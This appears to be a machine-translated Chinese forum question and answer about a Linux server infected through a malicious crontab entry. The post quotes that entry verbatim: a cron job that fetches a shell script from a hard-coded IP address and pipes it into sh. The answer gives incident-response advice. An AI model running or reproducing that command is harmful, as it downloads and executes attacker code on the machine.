为了抑制下面创建 crontab 条目的恶意软件,II 引入了 cron.deny 的用法
*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh
然而,所有用户 crontab 突然停止触发每项作业。在故障排除过程中,我观察到所有用户的所有 cron 关联文件均不可编辑。
ls -lht /etc/cron.denyus -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.deny
ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root
chmod 775 /etc/cron.deny
chmod: changing permissions of `/etc/cron.deny': Operation not permitted
chmod 775 /var/spool/cron/root
chmod: changing permissions of `/var/spool/cron/root': Operation not permitted
后来我发现它们都有一个不可变的属性。
lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root
lsattr /etc/cron.deny
----i--------e- /etc/cron.deny
我使用以下命令更改了不可变属性:
chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root
然而 cron 无法触发这些作业。
答案1
停在那里!您的系统已被恶意软件感染。此时,您不能相信系统所说的内容。该恶意软件可能修改了内核。您所看到的就是恶意软件希望您看到的。系统的行为可能不一致。例如,不要期望仅仅因为编辑器成功保存了文件就对其进行修改。
重申一下,忘记理解权限、不可变属性等。所有这些东西都是针对一个工作系统的。在受损的系统上,事情不会以任何一致的方式运行。
您现在需要做的是:
- 立即让服务器离线。它可能正在用恶意软件感染用户。
- 进行备份。不要删除任何现有的备份!您需要备份受感染的系统有两个原因:追踪感染的来源,并确保您拥有最新的数据。
- 弄清楚你是如何被感染的。这很重要:如果您使用与以前相同的安全漏洞恢复系统,它会再次受到感染。
- 从头开始安装新系统。您无法可靠地从系统中删除恶意软件。恶意软件试图让这一切变得困难,而且你永远无法确定你是否能够欺骗它。
确保安装所有软件的最新安全更新,并对其进行安全配置,以免再次受到感染。 - 恢复您的数据。确保仅恢复数据, 并不是易受攻击的软件。
也可以看看如何处理受感染的服务器?